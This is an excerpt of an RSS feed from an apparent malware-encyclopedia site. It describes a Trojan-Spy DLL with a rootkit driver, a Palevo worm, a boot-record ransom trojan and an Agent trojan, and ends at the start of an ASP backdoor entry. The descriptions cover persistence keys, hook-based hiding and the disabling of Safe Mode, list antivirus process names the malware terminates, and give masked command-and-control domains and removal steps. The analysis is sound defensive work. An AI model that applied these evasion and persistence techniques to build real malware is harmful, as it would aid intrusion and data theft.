&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Trojan-Spy spies upon user's activity and steals confidential user information. It is Windows DLL (PE DLL-file). It is 120359 in size. It is written in C++.
&lt;/p&gt;&lt;p&gt;md5: D6AB8A0510BB02E4FC7500F9512355E2
&lt;/p&gt;&lt;p&gt;sha1: 8E8417D3E5D0CE07A3CAE68D61E761CB86C66E33
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;This malware dll is used as a component of other malicious programs. The basic functionality is to provide an attacker with a remote access to a user’s computer and hiding its presence on a user's computer.
&lt;/p&gt;&lt;p&gt;Once launched the library extracts from its body the driver:
&lt;/p&gt;
&lt;pre&gt;
%System%\_amdevntas.sys
(MD5: 72553ce6060c2d10eaf432b9f60ae511)
&lt;/pre&gt;
&lt;p&gt;The file is 34816 bytes and detected by Kaspersky Antivirus as Rootkit.Win32.AntiAv.bq.
&lt;/p&gt;&lt;p&gt;To run the extracted file the trojan creates and runs the service: 
&lt;/p&gt;
&lt;pre&gt;PDCOMP
&lt;/pre&gt;
&lt;p&gt;At the same time adding information to the registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SYSTEM\CurrentControlSet\Services\PDCOMP]
&amp;quot;ErrorControl&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;ImagePath&amp;quot; = &amp;quot;%System%\_amdevntas.sys&amp;quot;
&amp;quot;Start&amp;quot; = &amp;quot;3&amp;quot;
&amp;quot;Type&amp;quot; = 1
&lt;/pre&gt;
&lt;p&gt;After the successful launch it removes the option "ImagePath" in the created registry key.
&lt;/p&gt;&lt;p&gt;This driver performs the following actions:
&lt;/p&gt;&lt;p&gt;1. Removes hooks installed in SSDT handle table to counteract protective and antiviral mechanisms in the system.
&lt;/p&gt;&lt;p&gt;2. Hides its registry key by installing a hook on the function "HHIVE:: GetCellRoutine"
&lt;/p&gt;&lt;p&gt;3. Hides files with the substring "amdevnta" by installing a hook on the function "IRP_MJ_DIRECTORY_CONTROL" in \FileSystem\Ntfs.
&lt;/p&gt;&lt;p&gt;4. Hides its online activity by installing a hook on the function "IRP_MJ_DEVICE_CONTROL" in \Device\TCP.
&lt;/p&gt;&lt;p&gt;5. Blocks obtaining a list of libraries loaded into a malicious process by installing a hook on function "ObReferenceObjectByHandle" to counteract protective and antiviral mechanisms.
&lt;/p&gt;&lt;p&gt;6. Terminates processes with the following substrings:
&lt;/p&gt;
&lt;pre&gt;
ekrn
nod32
Scanner
avp
scan32
360
ScanFrm
ccSvcHst
avscan
xnlscn
V3Medic
AhnSD
Avast
Rtvscan
avg
uiscan
mcshield
Spider
&lt;/pre&gt;
&lt;p&gt;7. Counteracts antivirus solutions by "ESTsoft" and "Doctor Web".
&lt;/p&gt;&lt;p&gt;The trojan connects to a server of an attacker to provide a backdoor functional:
&lt;/p&gt;
&lt;pre&gt;xiaonong.m****.com:80
&lt;/pre&gt;
&lt;p&gt;Malicious library can perform the following steps, depending on the commands received from the attacker:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Interception of keys pressed by a user on a keyboard, received data is stored in the following file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;%CurrentDir%\syslog.dat
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Blocking keys pressed by the user on a keyboard (keys or combination of keys are blocked specified by an attacker, for example, "Ctrl + Alt + Del" - the Task Manager call);
&lt;/li&gt;&lt;li&gt; Emulating keystrokes;
&lt;/li&gt;&lt;li&gt; Downloading and running other malicious files from addresses specified by an attacker (including the dll which can be used to download an updated version of the malware);
&lt;/li&gt;&lt;li&gt; Opening Internet resources specified by an attacker using Internet Explorer (request to resources can be hidden, or, vice versa, - displayed to a user);
&lt;/li&gt;&lt;li&gt; Installing services and records to run them automatically in the following registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;[HKLM\SYSTEM\CurrentControlSet\Services\&amp;lt;Service Name&amp;gt;]
&lt;/pre&gt;
&lt;p&gt;&amp;lt;Service Name&amp;gt; - a service name, it is passed to the library as a parameter when calling a function within the library.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Establishing a connection to the attacker's server, where IP-address and port are specified in a function call;
&lt;/li&gt;&lt;li&gt; Changing a port number or IP-address to communicate with an attacker;
&lt;/li&gt;&lt;li&gt; Saving and sending images from webcams and audio from a user's microphone to an attacker;
&lt;/li&gt;&lt;li&gt; File Management (getting a list of files, sending files to an attacker, deleting and creating files and folders, renaming, data on file, covert or displayed to a user files opening, files changing)
&lt;/li&gt;&lt;li&gt; Getting a list of processes;
&lt;/li&gt;&lt;li&gt; Management of processes (tracking the names of processes, terminating processes);
&lt;/li&gt;&lt;li&gt; Stealing passwords for dial-up connections;
&lt;/li&gt;&lt;li&gt; Getting a list of windows on a user's computer;
&lt;/li&gt;&lt;li&gt; Executing commands from the command line;
&lt;/li&gt;&lt;li&gt; Passing an attacker information about a user's computer (information about a processor, a version of operating system, a list of logical drives);
&lt;/li&gt;&lt;li&gt; Managing services (stop, start, delete, create, check availability, get information about the services, change startup parameters). The library also can change the executable service file by changing the following registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;[HKLM\SYSTEM\CurrentControlSet\Services\&amp;lt;Service Name&amp;gt;]
&lt;/pre&gt;
&lt;p&gt;In addition, the library allows an attacker to send pictures of a user's desktop and receive commands from it to manipulate a mouse, thereby implementing a RAT functional (Remote Administration Tool);
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 18 Jun 2011 23:10:22 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan-Spy.Win32.Batton.rk</guid>
		</item>
		<item>
			<title>P2P-Worm.Win32.Palevo.cvbu</title>
			<link>http://www.totalmalwareinfo.com/eng/P2P-Worm.Win32.Palevo.cvbu</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;
Worm copies itself to local disks and accessible network resources. It is Windows (PE-EXE file) application. It is 623616 bytes in size. It is packed by unknown packer. The unpacked size is about 667 Kb. It is written in Delphi.
&lt;/p&gt;&lt;p&gt;md5: D78C9132BCF1F000D92FBF8DED4295A7
&lt;/p&gt;&lt;p&gt;sha1: 79000F6A22BA11D85B893738947EA3A45187B1A9
&lt;/p&gt;
&lt;table id="toc" class="toc"&gt;&lt;tr&gt;&lt;td&gt;&lt;div id="toctitle"&gt;&lt;h2&gt;Contents&lt;/h2&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li class="toclevel-1 tocsection-1"&gt;&lt;a href="#Installation"&gt;&lt;span class="tocnumber"&gt;1&lt;/span&gt; &lt;span class="toctext"&gt;Installation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-2"&gt;&lt;a href="#Payload"&gt;&lt;span class="tocnumber"&gt;2&lt;/span&gt; &lt;span class="toctext"&gt;Payload&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-3"&gt;&lt;a href="#Propagation"&gt;&lt;span class="tocnumber"&gt;3&lt;/span&gt; &lt;span class="toctext"&gt;Propagation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-4"&gt;&lt;a href="#Removal_instruction"&gt;&lt;span class="tocnumber"&gt;4&lt;/span&gt; &lt;span class="toctext"&gt;Removal instruction&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;script&gt;if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } &lt;/script&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the worm copies its body to a file:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\srtserv\&amp;lt; original worm name&amp;gt;
&lt;/pre&gt;
&lt;p&gt;To ensure that the copy created is launched automatically each time the system is rebooted, the following registry keys are created:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;srtserv&amp;quot; = &amp;quot;%ALLUSERSPROFILE%\Application Data\srtserv\&amp;lt;original worm name&amp;gt;&amp;quot;

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;srtserv&amp;quot; = &amp;quot;%ALLUSERSPROFILE%\Application Data\srtserv\&amp;lt;original worm name&amp;gt;&amp;quot;
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The worm file’s icon is similar to the icon of Windows Explorer folder.
&lt;/p&gt;&lt;p&gt;To control the uniqueness of its process the worm creates a unique identifier with the following names:
&lt;/p&gt;
&lt;pre&gt;YCS0mRtQ316
&lt;/pre&gt;
&lt;p&gt;The worm records a path to the original file and the ID of its process: 
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\MSrtn] 
&amp;quot;value1&amp;quot; = &amp;quot;original malicious file’s name&amp;quot;
&amp;quot;value2&amp;quot; = &amp;quot;process PID&amp;quot;
&lt;/pre&gt;
&lt;p&gt;After that, it extracts from its body and executes the following library: 
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\srtserv\sdata.dll
&lt;/pre&gt;
&lt;p&gt;This file is 23552 bytes in size and detected by Kaspersky antivirus as Trojan.Win32.Agent2.decp (md5:374F995DD3D9E5D293C98F0DDAB39618).
&lt;/p&gt;&lt;p&gt;This file performs the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Creates a unique identifier with the name:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;KAENA_HOOK
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Injects a malicious code into all user processes;
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;The injected malicious code checks registry key values:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\MSrtn]
&amp;quot;value1&amp;quot;
&amp;quot;value2&amp;quot;
&lt;/pre&gt;
&lt;p&gt;After that hooks the following functions:
&lt;/p&gt;
&lt;pre&gt;
ZwQueryDirectoryFile 
ZwQuerySystemInformation 
ZwOpenProcess
&lt;/pre&gt;
&lt;p&gt;The hooks allows the worm to hide a folder with a worm’s copy, malware file and process (a file name and an identifier of the process it gets out of a registry key).
&lt;/p&gt;&lt;p&gt;To lock booting in Safe Mode, the worm deletes the contents of the following registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\NetWork]
&lt;/pre&gt;
&lt;p&gt;It stops the service named "ShellHWDetection".
&lt;/p&gt;&lt;p&gt;To implement a backdoor functional it connects to one of the following resources: 
&lt;/p&gt;
&lt;pre&gt;
http://pu****11.comlu.com
http://de****63.110mb.com
http://v****rd.freehostia.com
http://s****nt-card.ru
http://el****t.ru
http://ps****bal.com
http://ps****gi.dk
http://p****ik.freehostia.com
&lt;/pre&gt;
&lt;p&gt;when connection is successfully established the worm may perform the following actions:
&lt;/p&gt;&lt;p&gt;1. loading its updated version, with the old malware file renaming by adding the extension ".bak", and then deleting it. The updated version is stored with the name "update.dat" in the following folder:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\srtserv\update.dat
&lt;/pre&gt;
&lt;p&gt;then renames and launches it for execution.
&lt;/p&gt;&lt;p&gt;2. loading a configuration file that may contain references to both malicious resources and the resources to "cheat" rating, while the data is stored in the following file:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\srtserv\setx.txt
&lt;/pre&gt;
&lt;p&gt;3. the worm contains strings for the utility "Multi Password Recovery", in particular for the hidden launch of this tool and its further use.
&lt;/p&gt;&lt;p&gt;The main functionality of this utility is to decrypt passwords for many popular applications (FTP, E-mail clients, Instant messengers, browsers, etc.).
&lt;/p&gt;&lt;p&gt;4. downloading other malicious programs and running them for execution.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Propagation"&gt;Propagation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The worm copies its body to all writable network and removable drives connected to the infected computer:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;name of an infected partition&amp;gt;:\&amp;lt;original malicious file’s name&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Together with its copy of the worm puts in the root directory of an infected disk file:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;name of an infected partition&amp;gt;:\autorun.inf
&lt;/pre&gt;
&lt;p&gt;This file is 289 bytes in size and designed to automatically activate the worm when an infected disk is being opening using Explorer.
&lt;/p&gt;&lt;p&gt;The attributes "read only", "hidden" and "system" are set to the file.
&lt;/p&gt;&lt;p&gt;In addition, the worm copies itself to the names of directories on removable drives, adding to them ".exe" extension:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;name of an infected partition &amp;gt;:\&amp;lt;folder name on a removable disk&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;In this case, the attributes "read only", "hidden", "system" are set to the folders as well.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instruction"&gt;Removal instruction&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Using Kaspersky Rescue Disk 10 (&lt;a href="http://support.kaspersky.com/viruses/rescuedisk" class="external text"&gt;download Kaspersky Rescue Disk&lt;/a&gt;) delete the folder and its content:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\srtserv
&lt;/pre&gt;
&lt;p&gt;2. Boot in a normal mode.
&lt;/p&gt;&lt;p&gt;3. Delete the registry keys in system registry:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;srtserv&amp;quot; = &amp;quot;%ALLUSERSPROFILE%\Application Data\srtserv\&amp;lt; original malware name &amp;gt;&amp;quot;

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;srtserv&amp;quot; = &amp;quot;%ALLUSERSPROFILE%\Application Data\srtserv\&amp;lt;original malware name&amp;gt;&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\MSrtn]
&amp;quot;value1&amp;quot; = &amp;quot;original malicious file name&amp;quot;
&amp;quot;value2&amp;quot; = &amp;quot;PID process&amp;quot;
&lt;/pre&gt;
&lt;p&gt;4. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;5. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 12 Jun 2011 18:17:02 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/P2P-Worm.Win32.Palevo.cvbu</guid>
		</item>
		<item>
			<title>Trojan-Ransom.Boot.Seftad.a</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan-Ransom.Boot.Seftad.a</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a trojan that disables a personal computer in order to obtain a ransom for re-enabling. It is Windows application (PE-EXE files). It is 49,664 bytes in size. It is writer in C++.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Right after the start, the trojan appends a special code to the Main Boot Record of Microsoft Windows. Then, the trojan restart the system.
&lt;/p&gt;&lt;p&gt;Thus, during the boot, the user will see the following message:
&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:Seftad-a1.png" class="image"&gt;&lt;img alt="Seftad-a1.png" src="http://www.totalmalwareinfo.com/en/images/2/20/Seftad-a1.png" width="664" height="139" /&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;pre&gt;
Your PC is blocked.
All the hard drives were encrypted.
Browse www.safe-data.ru to get an access to your system and files.
Any attempt to restore the drives using other way will
lead to inevitable data loss&amp;nbsp;!!!
Please remember Your ID: 773921,
with its help your sign-on password will be generated. Enter password:
&lt;/pre&gt;
&lt;p&gt;The user is asked to pay a ransom via a website in order to get the code to decrypt data on hard-drives. Actually, the trojan doesn’t encrypt data, it blocks proper boot-up only.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer wasn’t protected with an antivirus program and was infected with this malicious program, perform the following actions to remove it:
&lt;/p&gt;
&lt;ol&gt;&lt;li&gt; Enter the password: aaaaaaciip. The trojan will restore original Master Boot Record.
&lt;/li&gt;&lt;li&gt; Perform full system scan with an antivirus program.
&lt;/li&gt;&lt;/ol&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Fri, 10 Jun 2011 16:11:09 +0300</pubDate>
			<author>Volodymyr Obrizan</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan-Ransom.Boot.Seftad.a</guid>
		</item>
		<item>
			<title>Trojan.Win32.Agent.nbcc</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan.Win32.Agent.nbcc</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Trojan program that performs malicious activities in the user’s system. It is a Windows (PE64 DLL-file). It is 83968 bytes in size. It is written in C++.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Installation in the system and creating the initial conditions to run this trojan performed by other malicious programs.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The program terminates its execution, if an account name, under which it is running, is different from:
&lt;/p&gt;
&lt;pre&gt;SYSTEM
&lt;/pre&gt;
&lt;p&gt;The trojan allows access to the infected system and has a number of commands to manipulate (search, create, move, delete) files and folders, downloading and running files, terminating the processes and logging out of the system.
&lt;/p&gt;&lt;p&gt;The Trojan also creates a SOCKS5 proxy server on any port. A notification of infection the trojan sends to an address that is stored in encrypted form in the registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\System\CurrentControlSet\Services\Tcpip\Performance]
&amp;quot;WbemAdapCode&amp;quot;
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Reboot a computer in a “Safe Mode” (at the beginning of system boot, press and hold the «F8», then select the «Safe Mode» the Windows boot menu).
&lt;/p&gt;&lt;p&gt;2. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;3. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 05 Jun 2011 22:47:12 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan.Win32.Agent.nbcc</guid>
		</item>
		<item>
			<title>Backdoor.ASP.Ace.jd</title>
			<link>http://www.totalmalwareinfo.com/eng/Backdoor.ASP.Ace.jd</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The program is designed for testing a web server running on the user's computer for vulnerabilities, as well as stealing confidential information. It is HTML-page that uses ASP (Active Server Pages) technology, contains Java Script scenarios, and Visual Basic Script. It is 140205 bytes in size.
&lt;/p&gt;&lt;p&gt;md5: CD3CF4FC6E5404010F0D089FB6628A04
&lt;/p&gt;&lt;p&gt;sha1: 829D6EBE574A1894D42BDEB0F0F24913CD366D86
&lt;/p&gt;
